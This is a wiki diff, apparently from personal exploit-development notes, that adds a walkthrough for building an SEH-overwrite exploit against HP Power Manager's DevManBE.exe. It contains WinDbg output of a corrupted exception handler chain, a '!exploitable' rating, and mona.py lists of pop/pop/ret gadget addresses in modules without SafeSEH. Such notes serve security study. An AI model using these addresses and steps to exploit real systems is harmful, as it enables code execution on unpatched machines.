Differences

This shows you the differences between two versions of the page.

--- exploiting:windows:hppowerman [2019/05/07 15:34] – created ebaer
+++ exploiting:windows:hppowerman [2019/05/07 15:48] (current) – ebaer
@@ Line 472: / Line 472: @@
 </code>
+===== Exception Handler =====
+<code>
+:000> d fs:[0]
+:00000000  0018f80c 00190000 0018b000 00000000
+:00000010  00001e00 00000000 7efdd000 00000000
+:00000020  00000c10 00000dbc 00000000 00625340
+:00000030  7efde000 00000003 00000000 00000000
+:00000040  00000000 00000000 00000000 00000000
+:00000050  00000000 00000000 00000000 00000000
+:00000060  00000000 00000000 00000000 00000000
+:00000070  00000000 00000000 00000000 00000000
+:000> d 0018f80c
+f80c  41414141 41414141 41414141 41414141
+f81c  41414141 41414141 41414141 41414141
+f82c  41414141 41414141 41414141 41414141
+f83c  41414141 41414141 41414141 41414141
+f84c  41414141 41414141 41414141 41414141
+f85c  41414141 41414141 41414141 41414141
+f86c  41414141 41414141 41414141 41414141
+f87c  41414141 41414141 41414141 41414141
+</code>
+<code>
+:000> !exchain
+f80c: 41414141
+Invalid exception stack at 41414141
+</code>
+===== Exploitable? =====
+<code>
+:005> .load msec
+:005> !exploitable
+!exploitable 1.6.0.0
+*** WARNING: Unable to verify checksum for C:\Program Files (x86)\HP\Power Manager\DevManBE.exe
+*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\HP\Power Manager\DevManBE.exe
+Exploitability Classification: EXPLOITABLE
+Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at msvcrt!_get_printf_count_output+0x000000000000002e (Hash=0x65c12afd.0x93798406)
+Corruption of the exception handler chain is considered exploitable
+</code>
 ===== Step =====
@@ Line 495: / Line 543: @@
 </code>
+====== SafeSEH exploit ======
+<code>
+:005> .load pykd.pyd
+:005> !py mona seh
+Hold on...
+[+] Command used:
+!py mona.py seh
+---------- Mona command started on 2019-05-07 06:48:06 (v2.0, rev 585) ----------
+[+] Processing arguments and criteria
+    - Pointer access level : X
+[+] Generating module info table, hang on...
+    - Processing modules
+    - Done. Let's rock 'n roll.
+[+] Querying 3 modules
+    - Querying module MSVCP60.dll
+    - Querying module DevManBE.exe
+    - Querying module DCL.dll
+[+] Setting pointer access level criteria to 'R', to increase search results
+    New pointer access level : R
+[+] Preparing output file 'seh.txt'
+    - (Re)setting logfile c:\_c\mona\seh.txt
+[+] Writing results to c:\_c\mona\seh.txt
+    - Number of pointers of type 'add esp,8 # ret 0x04' : 2
+    - Number of pointers of type 'pop ebp # pop ebx # ret 0x04' : 4
+    - Number of pointers of type 'pop edi # pop esi # ret 0x04' : 17
+    - Number of pointers of type 'pop esi # pop ebx # ret 0x04' : 111
+    - Number of pointers of type 'pop ecx # pop ecx # ret ' : 39
+    - Number of pointers of type 'pop edi # pop esi # ret 0x08' : 13
+    - Number of pointers of type 'pop esi # pop ebx # ret 0x08' : 6
+    - Number of pointers of type 'add esp,8 # ret 0x08' : 20
+    - Number of pointers of type 'pop ecx # pop ecx # ret 0x04' : 2
+    - Number of pointers of type 'call dword ptr ss:[esp+08]' : 4
+    - Number of pointers of type 'pop edi # pop esi # ret 0x20' : 4
+    - Number of pointers of type 'pop esi # pop edi # ret ' : 1
+    - Number of pointers of type 'pop ebx # pop ecx # ret 0x08' : 2
+    - Number of pointers of type 'pop ebx # pop ebp # ret ' : 1
+    - Number of pointers of type 'pop ebx # pop ecx # ret ' : 8
+    - Number of pointers of type 'pop esi # pop ebp # ret 0x0c' : 4
+    - Number of pointers of type 'pop ebx # pop ebp # ret 0x10' : 15
+    - Number of pointers of type 'pop ebx # pop ecx # ret 0x04' : 6
+    - Number of pointers of type 'call dword ptr ss:[esp+2c]' : 1
+    - Number of pointers of type 'pop edi # pop ebp # ret 0x0c' : 1
+    - Number of pointers of type 'pop ebp # pop ebx # ret 0x10' : 1
+    - Number of pointers of type 'pop ebx # pop ebp # ret 0x0c' : 12
+    - Number of pointers of type 'pop esi # pop ecx # ret ' : 10
+    - Number of pointers of type 'pop ebp # pop ecx # ret 0x0c' : 1
+    - Number of pointers of type 'pop edi # pop esi # ret 0x10' : 4
+    - Number of pointers of type 'pop esi # pop ebx # ret 0x10' : 4
+    - Number of pointers of type 'pop esi # pop edi # ret 0x04' : 1
+    - Number of pointers of type 'pop edi # pop esi # ret ' : 27
+    - Number of pointers of type 'pop esi # pop ebx # ret ' : 23
+    - Number of pointers of type 'pop esi # pop ebx # ret 0x0c' : 8
+    - Number of pointers of type 'pop edi # pop esi # ret 0x0c' : 19
+    - Number of pointers of type 'pop esi # pop ebp # ret ' : 10
+    - Number of pointers of type 'pop edi # pop ebx # ret 0x04' : 1
+    - Number of pointers of type 'pop ebx # pop edi # ret ' : 3
+    - Number of pointers of type 'pop edi # pop ebx # ret ' : 2
+    - Number of pointers of type 'pop esi # pop ebp # ret 0x20' : 3
+    - Number of pointers of type 'pop ebx # pop ebp # ret 0x20' : 1
+    - Number of pointers of type 'pop edi # pop ebp # ret ' : 6
+    - Number of pointers of type 'pop ebp # pop ebx # ret ' : 12
+    - Number of pointers of type 'pop esi # pop ecx # ret 0x04' : 4
+    - Number of pointers of type 'pop ebp # pop ebx # ret 0x0c' : 1
+    - Number of pointers of type 'pop ebp # pop ebx # ret 0x08' : 6
+    - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
+    - Number of pointers of type 'pop ebx # pop esi # ret ' : 1
+    - Number of pointers of type 'add esp,8 # ret ' : 42
+    - Number of pointers of type 'add esp,4 # pop ebp # ret ' : 7
+    - Number of pointers of type 'pop esi # pop ebp # ret 0x04' : 5
+[+] Results :
+x1000672b |   0x1000672b : add esp,8 # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
+x1000678d |   0x1000678d : add esp,8 # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
+x0047001c |   0x0047001c : pop ebp # pop ebx # ret 0x04 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
+x0047f13d |   0x0047f13d : pop ebp # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
+x10002b0a |   0x10002b0a : pop ebp # pop ebx # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
+x10002b64 |   0x10002b64 : pop ebp # pop ebx # ret 0x04 | null {PAGE_EXECUTE_READ} [DCL.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DCL.dll)
+x7608165a |   0x7608165a : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x7608573e |   0x7608573e : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76085758 |   0x76085758 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x760857cf |   0x760857cf : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x760857e9 |   0x760857e9 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76085815 |   0x76085815 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76085cdd |   0x76085cdd : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76097a75 |   0x76097a75 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76097aa5 |   0x76097aa5 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76097f2f |   0x76097f2f : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x76097f60 |   0x76097f60 : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.2.3104.0 (C:\Program Files (x86)\HP\Power Manager\MSVCP60.dll)
+x00444527 |   0x00444527 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
+x00476b25 |   0x00476b25 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
+x004820d1 |   0x004820d1 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [DevManBE.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\HP\Power Manager\DevManBE.exe)
+... Please wait while I'm processing all remaining results and writing everything to file...
+[+] Done. Only the first 20 pointers are shown here. For more pointers, open c:\_c\mona\seh.txt...
+    Found a total of 476 pointers
+[+] This mona.py action took 0:00:02.870000
+</code>